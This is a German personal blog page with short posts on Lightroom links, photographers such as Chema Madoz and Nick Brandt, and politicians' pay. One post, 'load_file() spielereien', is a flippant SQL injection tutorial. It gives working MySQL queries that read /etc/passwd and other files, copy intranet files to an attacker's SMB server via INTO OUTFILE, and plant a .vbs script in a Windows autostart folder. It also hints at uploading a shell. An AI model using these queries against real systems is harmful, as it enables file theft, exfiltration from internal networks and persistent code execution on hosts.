Lightroom Sammelsurium
Überall im Netz geistern Quicktipps und kleine Anleitungen zum Workflow unter Lightroom herum, bis heute habe ich das Ganze über meine Bookmarks bei http://delicious.com gepflegt. Beim durchforsten des Netzes ist mir aufgefallen, dass sich irgendwie noch keiner die Mühe gemacht hat mal eine “Übersicht” zusammenzustellen. Prinzipiell soll das hier kein Backlinkgedöns für irgendwelche SEO Artikel werden , wer etwas beizutragen hat, kann mir gerne eine eMail schicken. Prinzipiell soll einfach unter 2-3 Stichworten der Link kategorisiert und auffindbar gemacht werden.
Das Ganze findet man in der Rubrik Projekte >> Lightroom Sammelsurium und wird ständig ausgebaut und erweitert.
mehrChema Madoz: “The Object’s Dream”
Ich möchte heute auf einen Fotografen aufmerksam machen: Chema Madoz. Dieser hat gerade eine Ausstellung im Museum für Angewandte Kunst in Frankfurt und macht so ziemlich das Gegenteil von dem, was wir unter Bildmanipulation verstehen. Er manipuliert nicht das Bild, sondern das Objekt.
Der Spanier hat es sich zur Aufgabe gemacht, alltägliche Dinge kontextuell zu verändern, dass sie eine frappierend neue Bedeutung gewinnen. Madoz hat nicht nur mich überrascht und verblüfft. Und dazu benötigt er nicht einmal Photoshop.
Für mich persönlich gab es eine Menge Anregungen zu Bildideen und deren Umsetzung oder aber auch mal neues anderes zu probieren.
Zitat von seiner Webseite:
“The irony with which madoz assaults recognizible objects creates a relationship with viewers that leads to paths of a parallel universe.”
Ein paralleles Universum – das ist eine gute Beschreibung dessen, was Madoz mit einfachsten Mitteln mit analoger Technik erreicht. Viele seiner Fotos enstanden bei natürlichem Licht und gerade weil Madoz nur direkt am Objekt manipuliert, wirken seine Bilder abstrakt, surreal und wie aus einer anderen Dimension.
Wie immer zum Abschluss noch der Link zu seiner Webseite.
mehrJugendliche Brandsätze(r) – Streetfotografie
Ross McDonnell fotografiert den Alltag von Jugendlichen außerhalb von Dublin und dabei entstehen Fotos die wachrüttelnder gar nicht sein können
mehrSchwarz Weiss Fotografie
Heute mal eher im Sinne einer Hommage an 2 Fotografen die für mich gerade im Bereich der s/w Fotografie zu den ganz Großen zählen. Ich will auch nicht länger darüber philosophieren was s/w ausmacht und warum gerade schwarz-weiss, für den einen sind es die Kontraste, für den anderen die besondere Ästhetik , die Möglichkeiten der Abstraktion … auf jeden Fall sind s/w Fotografien richtig in Szene gesetzt für mich wesentlich ausdrucksstärker – im ästhetischen sowie im inhaltlichen Sinn das ist der Punkt … Insofern auch 2 Fotografen zum schnuppern für die einen zum wieder erinnern für andere, einen der die Tierwelt in schwarz weiss ganz groß herausbringt und einen Fotografen der eine andere Art des ästhetischen gefunden hat …
Nick Brandt Link
Es ist einfach der Wahnsinn, wenn man sich seine Tierfotos anschaut. Es gibt wenige, die Tiere und vor allem Tiere in freier Laufbahn so ausdrucksstark aufnehmen können. Ein Buch ist auch erschienen – schaut es euch an über den Link.
Boogie Link
Wenn es um Randgruppen, Aussenseiter und Extreme geht dann fällt mir einfach nur Boogie ein. Als erstes bekam ich von ihm “It’s All Good” in die Hände, ich denke das gehört auch zu seinen bekanntesten Prublikationen – mich hat es buchstäblich aus den Latschen gerissen – schaut euch die Fotos an, das Gefühlsspektrum reicht auch für hartgesottene von schockiert bis ey cool Gangster …
mehrload_file() spielereien
Da mancher Orts noch das Verständnis fehlt, warum es eben nicht nur ein paar Datensätze betrifft, wenn jemand Zuriff über einen SQL Account hat. Möchte ich hier mal kurz aufzeigen welche Möglichkeiten prinzipiell zur Verfügung stehen, wenn man Zugriff auf einen MySQL Account hat. Eine sehr schöne und einfache Variante ist mittels load_file() und angeschlossene.
Grundlage ist z.b. folgender Query:
select 1,LOAD_FILE("/etc/passwd");
Wenn man das Ganze in einem SQL Injection verarbeitet, würde unter bestimmten Bedingungen der Browser dann über die Seite beispielsweise folgendes anzeigen:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh
Ok, da kommt der erste und sagt das File muss Lese- und oder Schreibberechtigungen für Alle oder den Dienst besitzen … hier soll es uns um das Prinzip gehen und ja er hat recht. Im einfachsten Falle suche ich mir bekannte Konfigurationsfiles, .htaccess Dateien etc. und versuche die auszulesen und Butter bei die Fische in 10 von 100 Fällen wird man fündig. Schlampig gesetzte Berechtigungen öffnen einem hier Tür und Tor. Aber an dieser Stelle ist ja noch nicht aller Tage Abend …
select load_file("\\\\[ip | server_name]\\filename");
select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename]";
Sind zwei weitere schöne Möglichkeiten um ans Ziel zu gelangen, im ersteren Falle ziehen wir uns über das SMB Protokoll eine beliebige Datei im zweiten Falle schreiben wir Daten über das SMB Protokoll an einen uns genehmen Platz und hey machen wir uns nichts vor – richtig konfigurierte Firewalls blockieren immer nur den eingehenden Verkehr auf ungenutzten Ports und erlauben immer sämtlichen Verkehr vom Host weg! 
Folgendes nicht unalltägliche Beispielszenario: Eine Firma betreibt einen Webserver auf dem Intranet und Webpräsenz zu gleich laufen, sprich ich kann über ein SQL Injection an allen Sicherheitsmechanismen vorbei Daten in das interne Netz schieben oder sie von dort downloaden.
UNION all select 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\mein_server\\test";
Da höre ich schon wieder den nächsten Quäker, aber ich weiss doch gar nicht welche Netze … doch die MySQL Variablen report_host und oder hostname geben uns Aufschluss, ansonsten sind wir alle schlau genug zu wissen, welche Netze für den privaten Gebrauch reserviert sind. Wir waren gerade beim Netzwerk … da fällt mir doch noch was ein, DNS Abfrage für Datenbänker – host und dig kann jeder. Auch eine Möglichkeit den internen DNS nach Mustern in der Hostvergabe abzufragen um herauszubekommen welche Netze sich in der Tiefe befinden.
select ‘huhu welt.’ INTO OUTFILE ‘\\\\domain.net\\?save.txt’
Eine interessantes Anwendungsbeispiel ist z.B. in das Startverzeichnis eines Windows Host eine .vbs oder .cmd Datei abzulegen …
select ‘msgbox “pew pew”‘ INTO OUTFILE ‘\\\\192.168.0.x\\c$\\Dokumente und Einstellungen\\All Users\\Startmenü\\Programme\\Autostart\\grussundkuss.vbs’;
Ok und wer immer noch nicht genug hat, der läd sich eine Shell oder überschreibt Dateien.
mehrDiätenanpassung
Während alle Bundesländer losgelöst der “politischen Färbung” mal wieder fleissig ihre Diäten nach oben geschraubt haben, gibt es allerdings auch welche die andere Wege gehen. Die Diäten in Baden-Würtemberg sind gesunken, weil sie nämlich an die Lohnentwicklung gekoppelt sind. Wenn es den Bürgern schlechter geht, kriegen auch die Politiker weniger. Wieso ist das eigentlich nicht überall so? Da müßte man nur noch was einbauen, dass auch die Neuverschuldung umgeschlagen und als Malus abgezogen wird von den Diäten, dann wäre das ein richtig gutes Modell! Sonst könnte jemand auf die Idee kommen, sich Wirtschaftswachstum auf Pump zu basteln, um mehr Diäten zu kriegen. Und das sieht man ja an der Entwicklung des Bundes, was das für eine schlechte Idee ist. (via fefe) Pressemitteilung
mehr
Letzte Kommentare